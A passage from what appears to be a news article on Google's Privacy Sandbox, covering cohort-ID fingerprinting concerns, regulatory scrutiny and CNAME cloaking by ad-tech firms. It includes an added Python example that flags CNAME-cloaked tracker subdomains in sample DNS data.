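Two things to notice. The cohort ID is identical on every site the user visits, which is the context-collapse EFF describes: the medical site and the retailer receive the same value. And `fingerprint_bits` is rarely zero; whatever entropy the cohort carries is added to the bits a site already gets from screen size, fonts and the like, which is why a “privacy-preserving” identifier still needs a large anonymity set and a strict k threshold.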

Also of note is the scope and potential implications of Privacy Sandbox.

With Chrome’s widespread market share of over 60% across desktop and mobile devices, Google’s attempts to replace the cookie have been met with skepticism and pushbacks, not to mention attracting regulatory scrutiny earlier this year over worries that “the proposals could cause advertising spend to become even more concentrated on Google’s ecosystem at the expense of its competitors.”

The initiative has also been called out for being under Google’s control and fears that it may only serve to tighten the company’s grip on the advertising industry and the web as a whole, which critics say will “force more marketers into their walled garden and will spell the end of the independent and Open Web.”

In response, Google noted it has taken into account the feedback about browser-centric control by incorporating what it calls a “trusted server” in FLEDGE to store information about an ad campaign’s bids and budgets.

All said and done, third-party cookies aren’t the only means to deliver targeted ads on the web. Companies that collect first-party data, including Facebook and Google, will still be able to serve personalized ads, and some ad tech firms have embraced a DNS technique called CNAME cloaking to pass off third-party tracking code as coming from the first party.
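CNAME cloaking works by pointing a subdomain of the publisher (say `metrics.news-example.com`) at the tracker’s host via a CNAME record, so the browser treats the tracker’s cookies and scripts as first-party. The check below is an added example (not from the article or any browser’s code): it flags a hostname whose CNAME chain leaves the publisher’s registrable domain. The DNS answers and domain names are constructed, and the tiny suffix table stands in for the real Public Suffix List, which is an assumption a production check must not make.

```python
"""Detect CNAME cloaking from resolved CNAME chains (added example)."""

# Stand-in for the Public Suffix List (assumption; use the real PSL in practice).
PUBLIC_SUFFIXES = {"com", "net", "io", "co.uk"}


def registrable_domain(host: str) -> str:
    """eTLD+1 of `host` under the suffix table above."""
    labels = host.lower().rstrip(".").split(".")
    for n in (2, 1):  # longest suffix first, so co.uk beats uk
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return host.lower()


# Constructed resolver output: first-party hostname -> CNAME chain as returned.
CNAME_SAMPLE = {
    "metrics.news-example.com": ["news-example.com.tracker-example.net",
                                 "edge.tracker-example.net"],
    "static.news-example.com": ["cdn.news-example.com"],
    "shop.example.co.uk": ["example.co.uk.analytics-example.io"],
}


def cname_cloaked(host: str, chain) -> list:
    """CNAME targets whose registrable domain differs from the host's own."""
    first = registrable_domain(host)
    return [t for t in chain if registrable_domain(t) != first]


def audit(records: dict) -> dict:
    """hostname -> offending targets, for every cloaked hostname in `records`."""
    return {h: cname_cloaked(h, c) for h, c in records.items() if cname_cloaked(h, c)}


if __name__ == "__main__":
    for host, targets in audit(CNAME_SAMPLE).items():
        print(f"{host} is CNAME-cloaked -> {targets}")
```

Note that the first target in the `metrics` chain embeds the publisher’s name as a label (`news-example.com.tracker-example.net`), a common pattern that fools a naive substring check; comparing registrable domains is what catches it.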

“Keeping the internet open and accessible for everyone requires all of us to do more to protect privacy — and that means an end to not only third-party cookies, but also any technology used for tracking individual people as they browse the web,” Google said, adding it remains “committed to preserving a vibrant and open ecosystem where people can access a broad range of ad-supported content with confidence that their privacy and choices are respected.”